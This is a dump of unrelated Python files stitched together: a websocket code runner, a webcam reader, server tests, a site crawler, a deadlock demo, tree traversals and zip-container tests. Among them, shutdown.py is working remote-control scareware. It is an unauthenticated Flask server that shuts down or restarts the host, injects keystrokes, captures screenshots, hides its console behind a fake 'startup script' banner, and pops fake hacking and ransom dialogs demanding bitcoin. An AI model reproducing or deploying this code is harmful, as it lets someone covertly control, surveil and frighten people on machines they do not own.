    iteration loops notice the flag and exit.
    """
    if self.thread is not None:
        # FIX: join() instead of the original `while is_alive(): pass`
        # busy-wait — same semantics, no CPU spin while the old threads
        # read the reload flag and terminate.
        self.thread.join()
        self.measure_thread.join()
    # Old threads are gone; lower the flag so the new loops can run.
    self.reload = False
    # New thread execution
    self.measure_thread = threading.Thread(target=self.measure_frequency)
    self.thread = threading.Thread(target=self.process_code, args=[source_code])
    self.thread.start()
    self.measure_thread.start()
    print("New Thread Started!")
# Function to read and set frequency from incoming message
def read_frequency_message(self, message):
    """Update brain/GUI cycle periods (ms) from a JSON frequency payload."""
    settings = json.loads(message)
    # Convert the requested frequency (Hz) into a per-iteration period (ms)
    self.time_cycle = 1000.0 / float(settings["brain"])
    self.thread_gui.time_cycle = 1000.0 / float(settings["gui"])
    return
# The websocket function
# Gets called when there is an incoming message from the client
def handle(self, client, server, message):
    """Websocket dispatcher: '#freq' messages tune rates, anything else
    is treated as user source code to execute.
    """
    if(message[:5] == "#freq"):
        frequency_message = message[5:]
        self.read_frequency_message(frequency_message)
        self.send_frequency_message()
        return
    try:
        # Any other message is user code: raise the reload flag so the
        # running threads stop, then hand the code to the executor.
        code = message
        self.reload = True
        self.execute_thread(code)
    except Exception as exc:
        # FIX: the original bare `except: pass` silently swallowed every
        # error. Keep the server alive, but surface the failure.
        print("Error while launching user code:", exc)
# Function that gets called when the server is connected
def connected(self, client, server):
    """Websocket callback: remember the client and start the HAL/GUI threads."""
    self.client = client
    self.hal.start_thread()
    # Start the GUI update thread
    self.thread_gui = ThreadGUI(self.gui)
    self.thread_gui.start()
    # Initial frequency report doubles as a ping to the client
    self.send_frequency_message()
    print(client, 'connected')
# Function that gets called when the connected closes
def handle_close(self, client, server):
    """Websocket callback: a client disconnected."""
    print(client, 'closed')
def run_server(self):
    """Create the websocket server on port 1905 and serve forever (blocking)."""
    self.server = WebsocketServer(port=1905, host=self.host)
    self.server.set_fn_new_client(self.connected)
    self.server.set_fn_client_left(self.handle_close)
    self.server.set_fn_message_received(self.handle)
    self.server.run_forever()
# Entry point: build the template and block in the websocket server loop.
if __name__ == "__main__":
    server = Template()
    server.run_server()
|
WebcamVideoStream.py
|
# import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
    """Read frames from a cv2.VideoCapture on a background thread so that
    read() never blocks on camera I/O.
    """

    def __init__(self, src=0):
        """Open the stream and grab an initial frame so read() has data
        even before start() is called."""
        self.stream = cv2.VideoCapture(src)
        (self.grabbed, self.frame) = self.stream.read()
        # Flag checked by the update loop; set by stop()
        self.stopped = False
        # FIX: keep a handle on the reader thread (the original discarded
        # it, so it could never be joined or inspected)
        self.thread = None

    def start(self):
        """Start the background reader thread; returns self for chaining."""
        self.thread = Thread(target=self.update, args=())
        # FIX: daemon thread — a forgotten stop() no longer prevents
        # interpreter exit.
        self.thread.daemon = True
        self.thread.start()
        return self

    def update(self):
        # Keep grabbing frames until stop() is called
        while True:
            # if the thread indicator variable is set, stop the thread
            if self.stopped:
                return
            # otherwise, read the next frame from the stream
            (self.grabbed, self.frame) = self.stream.read()

    def read(self):
        """Return the frame most recently read."""
        return self.frame

    def stop(self):
        """Signal the reader thread to exit."""
        self.stopped = True
|
test_serve.py
|
import unittest
import asyncio
import io
import multiprocessing
import urllib.request
import time
import grole
def simple_server():
    """Run a minimal grole app answering 'Hello, World!' at / (blocks forever)."""
    app = grole.Grole()
    @app.route('/')
    def hello(env, req):
        return 'Hello, World!'
    app.run(host='127.0.0.1')
class TestServe(unittest.TestCase):
    """End-to-end tests that run a grole server in a subprocess and talk
    to it over localhost:1234 (grole's default port).
    """

    def test_simple(self):
        """The hello-world route answers on the default port."""
        p = multiprocessing.Process(target=simple_server)
        p.start()
        time.sleep(0.1)  # give the server time to bind
        try:
            with urllib.request.urlopen('http://127.0.0.1:1234') as response:
                html = response.read()
            self.assertEqual(html, b'Hello, World!')
        finally:
            # FIX: terminate in finally so a failing assert no longer
            # leaks the server process.
            p.terminate()

    def test_fileserver(self):
        """grole's CLI file server serves files relative to its cwd."""
        p = multiprocessing.Process(target=grole.main, args=[['-a', '127.0.0.1']])
        p.start()
        time.sleep(0.1)
        try:
            with urllib.request.urlopen('http://127.0.0.1:1234/test/test.dat') as response:
                html = response.read()
            self.assertEqual(html, b'foo\n')
        finally:
            p.terminate()

    def test_https(self):
        """Speaking TLS to a plain-HTTP server must raise URLError."""
        p = multiprocessing.Process(target=simple_server)
        p.start()
        time.sleep(0.1)
        try:
            # FIX: the original called self.assertRaises(URLError) with no
            # callable, which creates an unused context manager and asserts
            # nothing. Actually perform the https request under the context.
            with self.assertRaises(urllib.error.URLError):
                urllib.request.urlopen('https://127.0.0.1:1234')
        finally:
            p.terminate()
|
crawler.py
|
#!/usr/bin/env python3
import os
import re
import bs4
import lxml
import asyncio
import requests
import threading
import tldextract
# Silence the InsecureRequestWarning that verify=False requests would emit
requests.packages.urllib3.disable_warnings()
# ANSI color codes for terminal output
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m'  # white
Y = '\033[33m' # yellow
user_agent = {
    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
}
# Module-level shared state: the parsed landing page, derived robots/sitemap
# URLs, and one accumulator per link category. Lists while collecting; each
# extractor rebinds its list to a set when it finishes de-duplicating.
soup = ''
r_url = ''
sm_url = ''
total = []
r_total = []
sm_total = []
js_total = []
css_total = []
int_total = []
ext_total = []
img_total = []
js_crawl_total = []
sm_crawl_total = []
def crawler(target, output, data):
    """Entry point: fetch `target`, then run every extractor and report via out()."""
    global soup, r_url, sm_url
    print('\n' + Y + '[!]' + Y + ' Starting Crawler...' + W + '\n')
    try:
        rqst = requests.get(target, headers=user_agent, verify=False, timeout=10)
    except Exception as e:
        print(R + '[-] Exception : ' + C + str(e) + W)
        exit()
    sc = rqst.status_code
    if sc == 200:
        page = rqst.content
        soup = bs4.BeautifulSoup(page, 'lxml')
        # Rebuild the hostname from its registered parts to derive the
        # robots.txt / sitemap.xml locations on the same host
        ext = tldextract.extract(target)
        hostname = '.'.join(part for part in ext if part)
        protocol = target.split('://')
        protocol = protocol[0]
        r_url = protocol + '://' + hostname + '/robots.txt'
        sm_url = protocol + '://' + hostname + '/sitemap.xml'
        # NOTE(review): the extractor coroutines below make blocking
        # `requests` calls, so this gather effectively runs them one after
        # another rather than concurrently.
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        tasks = asyncio.gather(
            robots(target),
            sitemap(),
            css(target),
            js(target),
            internal_links(target),
            external_links(target),
            images(target),
            sm_crawl(),
            js_crawl())
        loop.run_until_complete(tasks)
        loop.close()
        out(target, output, data)
    else:
        print (R + '[-]' + C + ' Status : ' + W + str(sc))
def url_filter(target):
    """Normalize the module-global `url` relative to `target` (mutates global state)."""
    global url
    # Root-relative path ('/x' but not protocol-relative '//x') → prefix target
    if all([url.startswith('/') == True, url.startswith('//') == False]):
        url = target + url
    else:
        pass
    # No scheme present: resolve protocol-relative and dot-relative forms
    if all([url.find('http://') == -1,
            url.find('https://') == -1]):
        url = url.replace('//', 'http://')
        url = url.replace('../', target + '/')
        url = url.replace('./', target + '/')
    else:
        pass
    # Bare relative path (no scheme, no dots, no '//') → join onto target
    if all([url.find('//') == -1,
            url.find('../') == -1,
            url.find('./') == -1,
            url.find('http://') == -1,
            url.find('https://') == -1]):
        url = target + '/' + url
    else:
        pass
async def robots(target):
    """Fetch robots.txt and harvest Allow/Disallow/Sitemap URLs into r_total."""
    global url, r_url, r_total
    print(G + '[+]' + C + ' Looking for robots.txt' + W, end = '')
    try:
        r_rqst = requests.get(r_url, headers=user_agent, verify=False, timeout=10)
        r_sc = r_rqst.status_code
        if r_sc == 200:
            print(G + '['.rjust(9, '.') + ' Found ]' + W)
            print(G + '[+]' + C + ' Extracting robots Links', end = '')
            r_page = r_rqst.text
            r_scrape = r_page.split('\n')
            for entry in r_scrape:
                # Only directive lines carry URLs
                if (entry.find('Disallow') == 0 or
                        entry.find('Allow') == 0 or
                        entry.find('Sitemap') == 0):
                    url = entry.split(': ')
                    try:
                        url = url[1]
                        url = url.strip()
                        url_filter(target)
                        r_total.append(url)
                        # XML targets also feed the sitemap crawler
                        if url.endswith('xml') == True:
                            sm_total.append(url)
                    except:
                        # Directive without a value — skip it
                        pass
            r_total = set(r_total)
            print(G + '['.rjust(8, '.') + ' {} ]'.format(str(len(r_total))))
        elif r_sc == 404:
            print(R + '['.rjust(9, '.') + ' Not Found ]' + W)
        else:
            print(R + '['.rjust(9, '.') + ' {} ]'.format(r_sc) + W)
    except Exception as e:
        print(R + '[-] Exception : ' + C + str(e) + W)
async def sitemap():
    """Fetch sitemap.xml and collect every <loc> URL into sm_total."""
    global url, sm_url, total, sm_total
    print(G + '[+]' + C + ' Looking for sitemap.xml' + W, end = '')
    try:
        sm_rqst = requests.get(sm_url, headers=user_agent, verify=False, timeout=10)
        sm_sc = sm_rqst.status_code
        if sm_sc == 200:
            print(G + '['.rjust(8, '.') + ' Found ]' + W)
            print(G + '[+]' + C + ' Extracting sitemap Links', end = '')
            sm_page = sm_rqst.content
            sm_soup = bs4.BeautifulSoup(sm_page, 'xml')
            links = sm_soup.find_all('loc')
            for url in links:
                url = url.get_text()
                if url != None:
                    sm_total.append(url)
            sm_total = set(sm_total)
            print(G + '['.rjust(7, '.') + ' {} ]'.format(str(len(sm_total))))
        elif sm_sc == 404:
            print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
        else:
            print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
    except Exception as e:
        print('\n' + R + '[-] Exception : ' + C + str(e))
async def css(target):
    """Collect .css hrefs from <link> tags of the parsed page into css_total."""
    global url, soup, total, css_total
    print(G + '[+]' + C + ' Extracting CSS Links' + W, end = '')
    css = soup.find_all('link')
    for link in css:
        url = link.get('href')
        if url != None and '.css' in url:
            url_filter(target)
            css_total.append(url)
    css_total = set(css_total)
    print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(css_total))) + W)
async def js(target):
    """Collect .js srcs from <script> tags of the parsed page into js_total."""
    global url, total, js_total
    print(G + '[+]' + C + ' Extracting Javascript Links' + W, end = '')
    js = soup.find_all('script')
    for link in js:
        url = link.get('src')
        if url != None and '.js' in url:
            url_filter(target)
            js_total.append(url)
    js_total = set(js_total)
    print(G + '['.rjust(4, '.') + ' {} ]'.format(str(len(js_total))))
async def internal_links(target):
    """Collect anchors whose href contains the target's registered domain."""
    global total, int_total
    print(G + '[+]' + C + ' Extracting Internal Links' + W, end = '')
    ext = tldextract.extract(target)
    domain = ext.registered_domain
    links = soup.find_all('a')
    for link in links:
        url = link.get('href')
        if url != None:
            if domain in url:
                int_total.append(url)
    int_total = set(int_total)
    print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(int_total))))
async def external_links(target):
    """Collect absolute anchors pointing outside the target's registered domain."""
    global total, ext_total
    print(G + '[+]' + C + ' Extracting External Links' + W, end = '')
    ext = tldextract.extract(target)
    domain = ext.registered_domain
    links = soup.find_all('a')
    for link in links:
        url = link.get('href')
        if url != None:
            if domain not in url and 'http' in url:
                ext_total.append(url)
    ext_total = set(ext_total)
    print(G + '['.rjust(6, '.') + ' {} ]'.format(str(len(ext_total))))
async def images(target):
    """Collect <img> srcs (length > 1 filters out bare '#'-style values)."""
    global url, total, img_total
    print(G + '[+]' + C + ' Extracting Images' + W, end = '')
    images = soup.find_all('img')
    for link in images:
        url = link.get('src')
        if url != None and len(url) > 1:
            url_filter(target)
            img_total.append(url)
    img_total = set(img_total)
    print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(img_total))))
async def sm_crawl():
    """Fetch every discovered sitemap (one daemon thread each) and collect
    their <loc> URLs into sm_crawl_total."""
    global sm_crawl_total
    print(G + '[+]' + C + ' Crawling Sitemaps' + W, end = '')
    threads = []
    def fetch(site_url):
        # Worker: download one sitemap and append its <loc> entries
        try:
            sm_rqst = requests.get(site_url, headers=user_agent, verify=False, timeout=10)
            sm_sc = sm_rqst.status_code
            if sm_sc == 200:
                sm_data = sm_rqst.content.decode()
                sm_soup = bs4.BeautifulSoup(sm_data, 'xml')
                links = sm_soup.find_all('loc')
                for url in links:
                    url = url.get_text()
                    if url != None:
                        sm_crawl_total.append(url)
            elif sm_sc == 404:
                print(R + '['.rjust(8, '.') + ' Not Found ]' + W)
            else:
                print(R + '['.rjust(8, '.') + ' {} ]'.format(sm_sc) + W)
        except Exception as e:
            print('\n' + R + '[-] Exception : ' + C + str(e))
    for site_url in sm_total:
        # Skip the root sitemap (already handled) and non-XML entries
        if site_url != sm_url:
            if site_url.endswith('xml') == True:
                t = threading.Thread(target=fetch, args=[site_url])
                t.daemon = True
                threads.append(t)
                t.start()
    for thread in threads:
        thread.join()
    sm_crawl_total = set(sm_crawl_total)
    print(G + '['.rjust(14, '.') + ' {} ]'.format(str(len(sm_crawl_total))))
async def js_crawl():
    """Fetch every discovered script (one daemon thread each) and regex out
    quoted http(s) URLs into js_crawl_total."""
    global js_crawl_total
    print(G + '[+]' + C + ' Crawling Javascripts' + W, end = '')
    threads = []
    def fetch(js_url):
        # Worker: download one script and scan statement-by-statement
        try:
            js_rqst = requests.get(js_url, headers=user_agent, verify=False, timeout=10)
            js_sc = js_rqst.status_code
            if js_sc == 200:
                js_data = js_rqst.content.decode()
                js_data = js_data.split(';')
                for line in js_data:
                    if any(['http://' in line, 'https://' in line]):
                        found = re.findall(r'\"(http[s]?://.*?)\"', line)
                        for item in found:
                            # len > 8 drops bare scheme-only matches
                            if len(item) > 8:
                                js_crawl_total.append(item)
        except Exception as e:
            print(R + '[-] Exception : ' + C + str(e))
    for js_url in js_total:
        t = threading.Thread(target=fetch, args=[js_url])
        t.daemon = True
        threads.append(t)
        t.start()
    for thread in threads:
        thread.join()
    js_crawl_total = set(js_crawl_total)
    print(G + '['.rjust(11, '.') + ' {} ]'.format(str(len(js_crawl_total))))
def out(target, output, data):
    """Merge every accumulator, print the unique-link count and, when output
    is requested, fill data['module-Crawler'] with counts and link lists."""
    global total
    total.extend(r_total)
    total.extend(sm_total)
    total.extend(css_total)
    total.extend(js_total)
    total.extend(js_crawl_total)
    total.extend(sm_crawl_total)
    total.extend(int_total)
    total.extend(ext_total)
    total.extend(img_total)
    total = set(total)
    print('\n' + G + '[+]' + C + ' Total Unique Links Extracted : ' + W + str(len(total)))
    if output != 'None':
        if len(total) != 0:
            data['module-Crawler'] = {'Total Unique Links Extracted': str(len(total))}
            try:
                data['module-Crawler'].update({'Title': soup.title.string})
            except AttributeError:
                # FIX: the original passed the *set* {'Title : None'} to
                # dict.update(), which raises at runtime; store a real
                # key/value pair instead.
                data['module-Crawler'].update({'Title': 'None'})
            data['module-Crawler'].update(
                {
                    'Count ( Robots )': str(len(r_total)),
                    'Count ( Sitemap )': str(len(sm_total)),
                    'Count ( CSS )': str(len(css_total)),
                    'Count ( JS )': str(len(js_total)),
                    'Count ( Links in JS )': str(len(js_crawl_total)),
                    'Count ( Links in Sitemaps )': str(len(sm_crawl_total)),
                    'Count ( Internal )': str(len(int_total)),
                    'Count ( External )': str(len(ext_total)),
                    'Count ( Images )': str(len(img_total)),
                    'Count ( Total )': str(len(total))
                })
            # Only attach non-empty categories
            if len(r_total) != 0:
                data['module-Crawler'].update({'Robots': list(r_total)})
            if len(sm_total) != 0:
                data['module-Crawler'].update({'Sitemaps': list(sm_total)})
            if len(css_total) != 0:
                data['module-Crawler'].update({'CSS': list(css_total)})
            if len(js_total) != 0:
                data['module-Crawler'].update({'Javascripts': list(js_total)})
            if len(js_crawl_total) != 0:
                data['module-Crawler'].update({'Links inside Javascripts': list(js_crawl_total)})
            if len(sm_crawl_total) != 0:
                data['module-Crawler'].update({'Links Inside Sitemaps': list(sm_crawl_total)})
            if len(int_total) != 0:
                data['module-Crawler'].update({'Internal Links': list(int_total)})
            if len(ext_total) != 0:
                data['module-Crawler'].update({'External Links': list(ext_total)})
            if len(img_total) != 0:
                data['module-Crawler'].update({'Images': list(img_total)})
|
deadlock.py
|
import threading
import socket
import select
import sys
# Shared lock contended by the two clients
l = threading.Lock()
# Loopback socket pair: s2 connects to the listener, s3 is the accepted peer
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("localhost", 0))  # port 0: let the OS pick a free port
listener.listen(1)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect(listener.getsockname())
s3 = listener.accept()[0]
def server():
    """Server side of the pair: answer every received chunk on s3 with 'aaa'
    until the peer closes the connection."""
    try:
        while True:
            # recv returning empty bytes means the peer closed
            if not s3.recv(100):
                s3.close()
                break
            # FIX: Python 3 sockets require bytes — the original sent the
            # str "aaa", which raises TypeError.
            s3.send(b"aaa")
    except KeyboardInterrupt:
        s3.close()
def client(name):
    """Client loop on s2: acquire the shared lock, poll for data, reply 'bbb'.

    The acquire/release tracing (acq/ACQ/rel/REL) makes the lock contention
    between the two clients visible on stdout.
    """
    try:
        while True:
            sys.stdout.write("%s acq\n" % (name,))
            try:
                l.acquire()
                sys.stdout.write("%s ACQ\n" % (name,))
                # Short select timeout so the lock is released periodically
                r, _, _, = select.select([s2], [], [], 0.1)
                if not r:
                    continue
                buf = s2.recv(100)
                if not buf:
                    s2.close()
                    break
                # FIX: Python 3 sockets require bytes — the original sent
                # the str "bbb", which raises TypeError.
                s2.send(b"bbb")
            finally:
                sys.stdout.write("%s rel\n" % (name,))
                l.release()
                sys.stdout.write("%s REL\n" % (name,))
    except KeyboardInterrupt:
        s2.close()
# Start the server and one client on worker threads...
t1 = threading.Thread(target=server)
t2 = threading.Thread(target=client, args=("C1",))
t1.start()
t2.start()
# ...and run a second client on the main thread so both contend for the lock
client("C2")
|
shutdown.py
|
import os
from flask import Flask, request, jsonify
import threading
import logging
from time import sleep
import pyautogui
from gtts import gTTS
import tempfile
#logging.getLogger("Flask").setLevel(logging.WARNING)
from playsound import playsound
import socket
import numpy as np
import cv2
# Disable pyautogui's corner-abort failsafe so scripted mouse moves never raise
pyautogui.FAILSAFE = False
#config
hide_self = True  # hide the console window on startup (see main())
#end of config
counter=1         # number of banner repetitions printed by clear_screen
use_alt_tab=True  # whether show_error alt-tabs away from the dialog
def clear_screen():
    """Repaint the console with a fake 'startup script' banner (Windows-only
    commands: cls / color). The banner grows by one line each call."""
    global counter
    sleep(1)
    os.system('cls')      # Windows clear-screen
    os.system("color A")  # green-on-black console colors
    print("Startup Script Running.....")
    print("Host is Windows")
    print("performing tasks do not close\n"*counter)
    counter = counter+1
def thread_clear_screen():
    """Repaint the console banner without blocking the request handler."""
    threading.Thread(target=clear_screen).start()
def thread_run_vb_in_background():
    """Execute the generated VBScript message box, then delete the script
    (Windows shell commands)."""
    os.system("call %temp%\\TEMPmessage.vbs")
    os.system("del %temp%\\TEMPmessage.vbs /f /q")
def show_error(title, message):
    """Pop a native VBScript MsgBox with the given title/message, run on a
    background thread; optionally alt-tab away from it."""
    # SECURITY FIX: title/message come straight from untrusted Flask form
    # data and are interpolated into an os.system command AND a VBScript
    # string literal. Strip the characters that would break out of either.
    for bad in ('"', '&', '|', '<', '>', '^', '%'):
        title = title.replace(bad, ' ')
        message = message.replace(bad, ' ')
    content = "echo x=MsgBox(\"" + message + "\",2+16,\"" + title + "\") > %temp%\\TEMPmessage.vbs"
    os.system(content)
    t = threading.Thread(target=thread_run_vb_in_background, args=())
    t.start()
    if use_alt_tab:
        pyautogui.hotkey('alt', 'tab')
def show_error_spam():
    """Pop a sequence of scare dialogs; alt-tab is suppressed for the middle
    ones so they stack on screen."""
    global use_alt_tab
    show_error("Dead", "Hacked By Velocoraptor")
    sleep(0.5)
    use_alt_tab = False  # keep the following dialogs in the foreground
    show_error("System Error", "System is curropted")
    sleep(0.5)
    show_error("Encrypting files", "50%")
    sleep(0.5)
    show_error("Virus Mirus", "143 accounts hijacked")
    sleep(0.5)
    show_error("Euro Miner", "Removed 34.09 euro from bank accounts")
    sleep(0.5)
    show_error("Restore Your Pc", "Pay 0.534btc to UDEIFUEU343FSRSFE343453399DFSKI")
    use_alt_tab = True   # restore the default for later calls
def showtext(text,use_enter):
    """Type `text` key-by-key into the focused window; optionally press Enter.

    NOTE(review): pyautogui.press is called per character — presumably only
    plain printable keys are intended; verify behavior for uppercase and
    special characters.
    """
    if len(text) > 0:
        for letter in text:
            pyautogui.press(letter)
    # The form field arrives as the literal string 'true'
    if use_enter == "true":
        pyautogui.press('enter')
def text_to_speach(text,language,use_slow):
    """Speak `text` with gTTS: synthesize to a temp mp3, play it, delete it
    (Windows `del` command)."""
    tts = gTTS(text=text, lang=language, slow=use_slow)
    tts.save(tempfile.gettempdir()+"\\speech.mp3")
    playsound(tempfile.gettempdir()+"\\speech.mp3")
    os.system("del "+tempfile.gettempdir()+"\\speech.mp3 /f /q")
# Flask application serving the remote-control endpoints below
app = Flask(__name__)
# Request logging was left enabled; uncomment to silence it.
#app.logger.disabled = True
#log = logging.getLogger('Flask')
#log.disabled = True
@app.route('/', methods=['GET'])
def index():
    """Health check: report the server as up."""
    thread_clear_screen()
    response = jsonify({'server': 'up'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/shutdown', methods=['GET'])
def shutdown():
    """Shut the host down immediately (Windows shutdown command)."""
    os.system('shutdown -s -t 0')
    thread_clear_screen()
    response = jsonify({'shutdown': 'ok'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/restart', methods=['GET'])
def restart():
    """Reboot the host immediately (Windows shutdown -r)."""
    os.system('shutdown -r -t 0')
    thread_clear_screen()
    response = jsonify({'restart': 'ok'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/alt_f4', methods=['GET'])
def alt_f4():
    """Send Alt+F4 to close the currently focused window."""
    pyautogui.hotkey('alt','F4')
    thread_clear_screen()
    response = jsonify({'altf4': 'ok'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/move_mouse', methods=['GET'])
def move_mouse():
    """Glide the cursor to the top-left corner over 0.5 s."""
    pyautogui.moveTo(0,0,0.5)
    thread_clear_screen()
    response = jsonify({'mouse': 'moved'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/mouse_spaz', methods=['GET'])
def mouse_spaz():
    """Drag the cursor in a down-left-up-right square (relative moves)."""
    pyautogui.move(0,1000,0.2)#down
    pyautogui.move(-1000,0,0.2)#left
    pyautogui.move(0,-1000,0.2)#up
    pyautogui.move(1000,0,0.2)#right
    thread_clear_screen()
    response = jsonify({'mouse': 'spazed'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/showerror', methods=['POST'])
def showerror():
    """Pop a native error dialog built from the posted 'title'/'message'."""
    title = request.form['title']
    message = request.form['message']
    # Run on a thread: the MsgBox blocks until dismissed
    t = threading.Thread(target=show_error,args=(title,message))
    t.start()
    thread_clear_screen()
    response = jsonify({'error_message': 'showed'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/text', methods=['POST'])
def text():
    """Type the posted 'text' into the focused window ('use_enter' flag)."""
    text = request.form['text']
    use_enter = request.form['use_enter']
    t = threading.Thread(target=showtext,args=(text,use_enter))
    t.start()
    thread_clear_screen()
    response = jsonify({'text': 'typed'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/showerror_spam', methods=['GET'])
def showerror_spam():
    """Trigger the scripted sequence of scare dialogs on a background thread."""
    t = threading.Thread(target=show_error_spam,args=())
    t.start()
    thread_clear_screen()
    response = jsonify({'error_message': 'spammed'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/speak', methods=['POST'])
def speak():
    """Speak the posted 'text' via gTTS ('language' and 'slow' form fields)."""
    text = request.form['text']
    language = request.form['language']
    use_slow = request.form['slow']
    # The 'slow' field arrives as a string flag; coerce to bool
    if use_slow == 'true':
        use_slow = True
    else:
        use_slow = False
    t = threading.Thread(target=text_to_speach,args=(text,language,use_slow))
    t.start()
    thread_clear_screen()
    # NOTE(review): payload 'text': 'typed' looks copy-pasted from /text —
    # confirm no client depends on it before changing.
    response = jsonify({'text': 'typed'})
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
@app.route('/screenshot', methods=['GET'])
def screenshot():
    """Capture the screen and return it as an image/png response."""
    path = tempfile.gettempdir() + "\\screenshot.png"
    image = pyautogui.screenshot()
    # pyautogui returns RGB; cv2 expects BGR for writing
    image = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
    cv2.imwrite(path, image)
    # FIX: the original used open(...).read(), leaking the file handle.
    with open(path, 'rb') as fh:
        img = fh.read()
    response = jsonify()
    response.mimetype = 'image/png'
    response.data = img
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response
def main():
    """Start the banner thread and serve the Flask app on the LAN interface."""
    t = threading.Thread(target=clear_screen,args=())
    t.start()
    if hide_self:
        # NOTE(review): spawns an empty hidden powershell — presumably meant
        # to hide this console window; verify it works as intended.
        os.system("powershell -window Hidden -command \"\"")
    # Bind to the outbound-facing IP on port 80
    app.run(host=get_ip(), port=80,debug=False)
def get_ip():
    """Return this machine's outbound-facing IP address.

    Connecting a UDP socket only selects a route — no packets are sent.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
    finally:
        # FIX: close even when connect() raises (the original leaked the
        # socket on error).
        s.close()
# Script entry point
if __name__ == '__main__':
    main()
|
tree-orders.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeOrders:
    """In-, pre- and post-order traversals of a binary tree stored as three
    parallel arrays (key, left-child index, right-child index); -1 marks a
    missing child and node 0 is the root."""

    def read(self):
        """Parse the tree from stdin: n, then n lines of 'key left right'."""
        self.n = int(sys.stdin.readline())
        self.key = [0] * self.n
        self.left = [0] * self.n
        self.right = [0] * self.n
        for idx in range(self.n):
            key, left, right = map(int, sys.stdin.readline().split())
            self.key[idx] = key
            self.left[idx] = left
            self.right[idx] = right

    def inOrder(self):
        """Return the keys in in-order (left, node, right)."""
        self.result = []
        self.inO(0)
        return self.result

    def inO(self, root):
        # Recursive helper for inOrder; -1 means "no child here".
        if root != -1:
            self.inO(self.left[root])
            self.result.append(self.key[root])
            self.inO(self.right[root])

    def preOrder(self):
        """Return the keys in pre-order (node, left, right)."""
        self.result = []
        self.preO(0)
        return self.result

    def preO(self, root):
        # Recursive helper for preOrder.
        if root != -1:
            self.result.append(self.key[root])
            self.preO(self.left[root])
            self.preO(self.right[root])

    def postOrder(self):
        """Return the keys in post-order (left, right, node)."""
        self.result = []
        self.posO(0)
        return self.result

    def posO(self, root):
        # Recursive helper for postOrder.
        if root != -1:
            self.posO(self.left[root])
            self.posO(self.right[root])
            self.result.append(self.key[root])
def main():
    """Read the tree from stdin and print the three traversal orders."""
    tree = TreeOrders()
    tree.read()
    print(" ".join(str(x) for x in tree.inOrder()))
    print(" ".join(str(x) for x in tree.preOrder()))
    print(" ".join(str(x) for x in tree.postOrder()))
# Run main on a worker thread so the enlarged stack_size above applies.
threading.Thread(target=main).start()
|
test_zip_container.py
|
import io
import multiprocessing
import os
import pickle
import random
import shutil
import string
import subprocess
import sys
import tempfile
import unittest
from datetime import datetime
from zipfile import ZipFile
import pytest
from parameterized import parameterized
import pfio
def make_zip(zipfilename, root_dir, base_dir):
    """Create a zip at `zipfilename` containing `base_dir`, with archive
    paths relative to `root_dir` (mirrors shutil.make_archive semantics).
    """
    pwd = os.getcwd()
    with ZipFile(zipfilename, "w") as f:
        os.chdir(root_dir)
        try:
            for root, dirs, filenames in os.walk(base_dir):
                for _dir in dirs:
                    path = os.path.normpath(os.path.join(root, _dir))
                    f.write(path)
                for _file in filenames:
                    path = os.path.normpath(os.path.join(root, _file))
                    f.write(path)
        finally:
            # FIX: always restore the working directory — the original left
            # the process chdir'd into root_dir if archiving raised.
            os.chdir(pwd)
def make_random_str(n):
    """Return a random alphanumeric string of length n."""
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choice(alphabet) for _ in range(n))
# Canonical names used to build the test zip layout (see TestZipHandler.setUp)
ZIP_TEST_FILENAME_LIST = {
    "dir_name1": "testdir1",
    "dir_name2": "testdir2",
    "zipped_file_name": "testfile1",
    "testfile_name": "testfile2",
    "nested_dir_name": "nested_dir",
    "nested_zip_file_name": "nested.zip",
}
# Paths that must not resolve inside the archive
NON_EXIST_LIST = ["does_not_exist", "does_not_exist/", "does/not/exist"]
class TestZipHandler(unittest.TestCase):
def setUp(self):
    """Build the zip layout shared by all tests:

    outside.zip
    | - testdir1
    |    | - nested1.zip        (contains nested_dir/nested)
    | - testdir2
    |    | - testfile1
    | - testfile2
    """
    self.test_string = "this is a test string\n"
    self.nested_test_string = \
        "this is a test string for nested zip\n"
    self.test_string_b = self.test_string.encode("utf-8")
    self.nested_test_string_b = \
        self.nested_test_string.encode("utf-8")
    self.fs_handler = pfio.create_handler("posix")
    # the most outside zip
    self.zip_file_name = "outside"
    # nested zip and nested file
    self.tmpdir = tempfile.TemporaryDirectory()
    self.nested_zipped_file_name = "nested"
    self.nested_dir_name = ZIP_TEST_FILENAME_LIST["nested_dir_name"]
    self.nested_dir_path = os.path.join(self.tmpdir.name,
                                        self.nested_dir_name)
    self.nested_zip_file_name = \
        ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]
    # directory and file
    self.dir_name1 = ZIP_TEST_FILENAME_LIST["dir_name1"]
    self.dir_name2 = ZIP_TEST_FILENAME_LIST["dir_name2"]
